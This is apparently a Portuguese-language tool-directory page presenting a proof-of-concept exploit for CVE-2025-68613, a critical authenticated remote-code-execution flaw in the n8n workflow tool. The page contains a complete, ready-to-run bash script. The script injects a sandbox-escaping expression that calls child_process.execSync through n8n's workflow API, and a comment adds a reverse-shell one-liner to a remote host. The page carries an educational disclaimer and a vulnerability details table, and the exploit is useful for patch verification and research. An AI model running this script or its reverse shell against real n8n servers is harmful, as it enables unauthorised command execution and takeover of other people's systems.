Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/mbanyamer/n8n-authenticated-expression-injection-rce-cve-2025-68613
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoFerramenta de Acesso RemotoDesenvolvimento de Payloads
GitHubmbanyamer/n8n-authenticated-expression-injection-rce-cve-2025-68613

n8n-Authenticated-Expression-Injection-RCE-CVE-2025-68613

Exploit de Prova de Conceito para CVE-2025-68613: Execução Remota de Código Autenticada no n8n via Expression Injection

Ver Repositório
22há 8 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

n8n Injeção de Expressão Autenticada RCE – CVE-2025-68613

Execução Remota de Código Crítica (CVSS 9.9) na Ferramenta de Automação de Fluxo de Trabalho n8n
Prova de Conceito – Apenas para uso educacional e pesquisa de segurança autorizada


⚠️ Aviso Legal Importante

Este código é fornecido ESTRITAMENTE para fins educacionais e testes de segurança autorizados em ambientes de laboratório controlados.

O uso não autorizado em sistemas de produção ou qualquer sistema sem permissão explícita por escrito é ilegal e viola leis de uso indevido de computadores e segurança cibernética na maioria das jurisdições.

Use por sua conta e risco. O autor não é responsável por qualquer uso indevido.


Informações da Vulnerabilidade

CampoDetalhes
Título do Exploitn8n Injeção de Expressão Autenticada Execução Remota de Código
CVECVE-2025-68613
Data de Divulgação2025-12-25
AutorMohammed Idrees Banyamer
País do AutorJordan
Contato / Redes SociaisInstagram: @banyamer_security
GitHubmbanyamer
Fornecedorn8n.io
Repositório do Softwaregithub.com/n8n-io/n8n
Versões Vulneráveis≥ 0.211.0 < 1.120.4
Versões Corrigidas1.120.4, 1.121.1, 1.122.0 e superiores
Testado Emn8n 1.119.3 (Docker)
Tipo de VulnerabilidadeExecução Remota de Código Autenticada via Escape do Sandbox de Expressões
Pontuação CVSS9.9 (Crítico)

Descrição

Esta vulnerabilidade permite que um usuário autenticado crie ou modifique fluxos de trabalho usando expressões maliciosas que contornam o sandbox de expressões do n8n, resultando na execução completa de comandos do sistema operacional com os privilégios do processo n8n.


Prova de Conceito – Script de Exploit Bash

root@kitploit:~
#!/bin/bash
# Exploit Title: n8n Authenticated Expression Injection RCE
# Date: 2025-12-25
# Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# GitHub: https://github.com/mbanyamer
# Vendor Homepage: https://n8n.io
# Software Link: https://github.com/n8n-io/n8n
# Version: >=0.211.0 <1.120.4
# Tested on: n8n 1.119.3 (Docker)
# CVE : CVE-2025-68613

TARGET="http://localhost:5678"                  # ← Change to your target
API_KEY="your_n8n_api_key_here"                 # ← Insert valid API Key (or use Basic Auth / session)
CMD="id"                                        # ← Test command
# Example reverse shell: "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"

PAYLOAD="{{ (function(){ return this.process.mainModule.require('child_process').execSync('${CMD}').toString() })() }}"

echo "[*] Sending malicious workflow to ${TARGET}"

curl -s -X POST "${TARGET}/rest/workflows" \
  -H "Content-Type: application/json" \
  -H "X-N8N-API-KEY: ${API_KEY}" \
  -d '{
    "name": "CVE-2025-68613 PoC",
    "active": false,
    "nodes": [
      {
        "parameters": {
          "values": {
            "string": [
              {
                "name": "result",
                "value": "'${PAYLOAD}'"
              }
            ]
          }
        },
        "name": "Exploit",
        "type": "n8n-nodes-base.set",
        "typeVersion": 1,
        "position": [460, 300]
      }
    ],
    "connections": {}
  }'

echo -e "\n[!] Check n8n logs or the output node in the created workflow for command result\n"
Baixar ferramenta